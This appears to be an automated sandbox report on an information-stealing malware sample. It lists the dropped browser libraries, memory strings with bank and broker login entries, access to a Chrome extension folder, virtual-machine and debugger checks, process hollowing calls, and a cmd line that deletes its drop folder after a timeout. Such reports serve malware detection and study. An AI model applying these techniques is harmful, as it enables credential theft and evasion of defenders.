                    Source: bind.aspx.exe, 00000004.00000003.1728292054.0000000024E86000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1740947331.0000000024E7A000.00000004.00000020.00020000.00000000.sdmp, DGDBAK.4.dr, CGHCGI.4.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: bind.aspx.exe | ReversingLabs: Detection: 42%
                    Source: unknown | Process created: C:\Users\user\Desktop\bind.aspx.exe "C:\Users\user\Desktop\bind.aspx.exe"
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: dbghelp.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: sxs.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: windows.fileexplorer.common.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: ntshrui.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: linkinfo.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: pcacli.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Section loaded: sfc_os.dll
                    Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                    Source: bind.aspx.exe | Static file information: File size 5424128 > 1048576
                    Source: bind.aspx.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x500a00
                    Source: Binary string: freebl3.pdb source: bind.aspx.exe, freebl3.dll.4.dr
                    Source: Binary string: mozglue.pdbP source: bind.aspx.exe, mozglue.dll.4.dr
                    Source: Binary string: freebl3.pdbp source: bind.aspx.exe, freebl3.dll.4.dr
                    Source: Binary string: nss3.pdb@ source: bind.aspx.exe, nss3.dll.4.dr
                    Source: Binary string: softokn3.pdb@ source: bind.aspx.exe, softokn3.dll.4.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: bind.aspx.exe, vcruntime140.dll.4.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: bind.aspx.exe, msvcp140.dll.4.dr
                    Source: Binary string: nss3.pdb source: bind.aspx.exe, nss3.dll.4.dr
                    Source: Binary string: mozglue.pdb source: bind.aspx.exe, mozglue.dll.4.dr
                    Source: Binary string: softokn3.pdb source: bind.aspx.exe, softokn3.dll.4.dr
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035549F EntryPoint,LoadLibraryA,GetProcAddress,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,OpenEventA,CloseHandle,OpenEventA,CreateEventA,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,ExitProcess,4_2_0035549F
                    Source: nss3.dll.4.dr | Static PE information: section name: .00cfg
                    Source: freebl3.dll.4.dr | Static PE information: section name: .00cfg
                    Source: mozglue.dll.4.dr | Static PE information: section name: .00cfg
                    Source: msvcp140.dll.4.dr | Static PE information: section name: .didat
                    Source: softokn3.dll.4.dr | Static PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0035A785 push ecx; ret 4_2_0035A798
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61EDC329 pushfd ; retf 0004h 4_2_61EDC32A
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61EDA2A8 push ds; retf 4_2_61EDA2AE
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File created: C:\ProgramData\GCAEHDBAAECB\vcruntime140.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File created: C:\ProgramData\GCAEHDBAAECB\freebl3.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File created: C:\ProgramData\GCAEHDBAAECB\softokn3.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File created: C:\ProgramData\GCAEHDBAAECB\msvcp140.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File created: C:\ProgramData\GCAEHDBAAECB\nss3.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File created: C:\ProgramData\GCAEHDBAAECB\mozglue.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00355EDC GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00355EDC
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Dropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\freebl3.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Dropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\vcruntime140.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Dropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\softokn3.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Dropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\msvcp140.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Dropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\nss3.dll
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Dropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\mozglue.dll
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 8036 | Thread sleep count: 79 > 30
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034AAF6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034AAF6
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003538DD wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_003538DD
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003532CD wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_003532CD
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00349B56 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00349B56
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034B957 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034B957
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003413B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_003413B4
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00353FEA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00353FEA
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00349633 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00349633
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00353C2D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00353C2D
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034A2AF wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0034A2AF
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00349305 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_00349305
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003536A9 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_003536A9
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034EA52 GetSystemInfo,wsprintfA,4_2_0034EA52
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000363C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6RECOVE~1vebrokerRecoveryImprovedomVMware20,11696492231}
                    Source: FIDAFC.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: FIDAFC.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: FIDAFC.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: FIDAFC.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000363C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: omVMware20,11696492231}
                    Source: FIDAFC.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                    Source: FIDAFC.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.0000000003570000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.0000000003525000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: FIDAFC.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: FIDAFC.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: FIDAFC.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: FIDAFC.4.dr | Binary or memory string: discord.comVMware20,11696492231f
                    Source: FIDAFC.4.dr | Binary or memory string: global block list test formVMware20,11696492231
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: FIDAFC.4.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                    Source: FIDAFC.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: FIDAFC.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: FIDAFC.4.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: FIDAFC.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: FIDAFC.4.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                    Source: FIDAFC.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: FIDAFC.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: FIDAFC.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: FIDAFC.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: FIDAFC.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: FIDAFC.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\bind.aspx.exeAPI call chain: ExitProcess graph end nodegraph_4-87759
                    Source: C:\Users\user\Desktop\bind.aspx.exeAPI call chain: ExitProcess graph end nodegraph_4-89124
                    Source: C:\Users\user\Desktop\bind.aspx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035A4A4 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0035A4A4
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035549F EntryPoint,LoadLibraryA,GetProcAddress,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,OpenEventA,CloseHandle,OpenEventA,CreateEventA,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,ExitProcess,4_2_0035549F
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00355BA7 mov eax, dword ptr fs:[00000030h]4_2_00355BA7
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034B030 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,strtok_s,lstrlenA,memset,4_2_0034B030
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_0035AADF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0035AADF
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,4_2_61EAF900
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,4_2_61EAF8FC

                    HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: bind.aspx.exe, type: SAMPLE
Source: Yara match; File source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_0034DD03 memset,memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,4_2_0034DD03
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_0034FD18 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0034FD18
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_0034FDF3 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0034FDF3
